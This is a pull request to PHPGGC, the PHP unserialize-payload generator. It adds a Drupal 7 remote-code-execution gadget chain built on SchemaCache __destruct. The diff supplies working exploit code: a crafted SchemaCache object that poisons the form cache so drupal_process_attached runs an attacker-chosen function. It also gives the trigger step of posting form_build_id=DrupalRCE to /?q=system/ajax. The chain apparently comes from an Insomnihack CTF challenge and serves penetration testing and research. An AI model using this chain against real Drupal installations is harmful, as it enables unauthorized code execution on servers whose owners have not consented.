### PR TITLE
Add Drupal7 >= 7.0.8 gadget using SchemaCache __destruct

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 *PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically*.
 When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of [frohoff's ysoserial](https://github.com/frohoff/ysoserial), but for PHP.
-Currently, the tool supports: Doctrine, Guzzle, Laravel, Magento, Monolog, Phalcon, Slim, SwiftMailer, Symfony, Yii and ZendFramework.
+Currently, the tool supports: Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Slim, SwiftMailer, Symfony, Yii and ZendFramework.
 
 
 ## Requirements
@@ -22,6 +22,7 @@ Gadget Chains
 
 NAME                  VERSION              TYPE             VECTOR         I    
 Doctrine/FW1          ?                    file_write       __toString     *    
+Drupal7/RCE1          >= 7.0.8             rce              __destruct     *
 Guzzle/FW1            6.0.0 <= 6.3.2       file_write       __destruct          
 Guzzle/RCE1           6.0.0 <= 6.3.2       rce              __destruct          
 Laravel/RCE1          5.4.27               rce              __destruct          

--- a/gadgetchains/Drupal7/RCE/1/chain.php
+++ b/gadgetchains/Drupal7/RCE/1/chain.php
@@ -1,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Drupal7;
+
+class RCE1 extends \PHPGGC\GadgetChain\RCE
+{
+    public $version = '>7.0.8';
+    public $vector = '__destruct';
+    public $author = 'Blaklis';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $parameter = $parameters['parameter'];
+
+        return new \SchemaCache($function,$parameter);
+    }
+}

--- a/gadgetchains/Drupal7/RCE/1/chain.php
+++ b/gadgetchains/Drupal7/RCE/1/chain.php
@@ -7,6 +7,7 @@ class RCE1 extends \PHPGGC\GadgetChain\RCE
     public $version = '>7.0.8';
     public $vector = '__destruct';
     public $author = 'Blaklis';
+    public $informations = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';
 
     public function generate(array $parameters)
     {

--- a/gadgetchains/Drupal7/RCE/1/gadgets.php
+++ b/gadgetchains/Drupal7/RCE/1/gadgets.php
@@ -1,0 +1,12 @@
+<?php
+
+class SchemaCache {
+	protected $cid = 'form_DrupalRCE';
+	protected $bin = 'cache_form';
+	protected $keysToPersist = ['#form_id'=>true, '#process'=>true, '#attached'=>true];
+	protected $storage = ['#form_id'=>'DrupalRCE','#process'=>['drupal_process_attached'], '#attached'=>[]];
+
+	public function __construct($function,$parameter) {
+		$this->storage['#attached']+=[$function=>[[$parameter]]];
+	}
+}


### PR DESCRIPTION
Adding Drupal7/RCE1 __destruct gadget using SchemaCache. It was the intended solution for my challenge for Insomnihack 2019's teaser, and was also well explained by RIPSTech team here : 

https://blog.ripstech.com/2019/complex-drupal-pop-chain/